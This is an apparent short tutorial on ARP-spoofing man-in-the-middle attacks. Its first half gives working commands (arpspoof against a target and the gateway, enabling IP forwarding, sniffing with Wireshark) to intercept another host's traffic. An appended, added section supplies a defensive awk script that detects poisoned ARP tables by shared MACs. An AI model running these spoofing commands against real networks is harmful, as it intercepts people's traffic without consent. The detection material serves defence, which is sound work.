How to perform Man-in-the-Middle attacks without those big GUI tools

This is done from a Linux box running Ubuntu 11.10.

sudo apt-get install dsniff

This will install the arp spoofing tool “arpspoof” that we need to poison the ARP-cache. Run it like so:

sudo arpspoof -i <your NIC> -t <the IP you want to grab data from> <the IP you want to impersonate (usually the gateway)>

Traffic that the target sends to the impersonated IP will now end up on your computer. To automatically forward said traffic, run the following command:

sudo sysctl net.ipv4.conf.all.forwarding=1

Traffic is now being forwarded. To see if you already have this enabled, run this:

sysctl -a | grep forward

To disable it, run the same sysctl command with forwarding=0.

Now you can run Wireshark or tcpdump and sniff the traffic.
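
Seen from the targeted host, the poisoned ARP cache has a recognisable shape: the gateway's IP resolves to the same MAC as another machine on the LAN. The script below is an added example, not part of the original post, that checks a table in /proc/net/arp format for that pattern; the function names and all addresses are constructed, and it assumes the host also holds an ARP entry for the spoofing machine's real IP.

```shell
#!/bin/sh
# Added example (not from the original post). All addresses are constructed.

# Constructed /proc/net/arp snapshot from a poisoned host: the gateway
# (192.168.1.1) and another LAN host (192.168.1.50) share one MAC.
sample_arp_table() {
    cat <<'EOF'
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         02:00:00:aa:bb:50     *        eth0
192.168.1.50     0x1         0x2         02:00:00:AA:BB:50     *        eth0
192.168.1.20     0x1         0x2         02:00:00:aa:bb:20     *        eth0
192.168.1.99     0x1         0x0         00:00:00:00:00:00     *        eth0
EOF
}

# find_shared_macs [FILE]
# Reads an ARP table in /proc/net/arp format (default: the live table,
# "-" for stdin) and prints "<device> <mac> <ip>,<ip>,..." for every MAC
# that answers for more than one IP on the same interface.
find_shared_macs() {
    awk '
        NR == 1      { next }    # header row
        $3 == "0x0"  { next }    # incomplete entry, no MAC learned yet
        {
            k = $6 " " tolower($4)          # interface + normalised MAC
            if ((k, $1) in seen) next       # ignore duplicate rows
            seen[k, $1] = 1
            n[k]++
            ips[k] = (n[k] == 1) ? $1 : ips[k] "," $1
        }
        END { for (k in n) if (n[k] > 1) print k, ips[k] }
    ' "${1:-/proc/net/arp}" | sort
}

# Run the check against the constructed snapshot.
sample_arp_table | find_shared_macs -
```

Run find_shared_macs with no argument to check the live table. A hit that includes the gateway's IP deserves a closer look; hosts with several IPs on one NIC and proxy-ARP routers also trigger it.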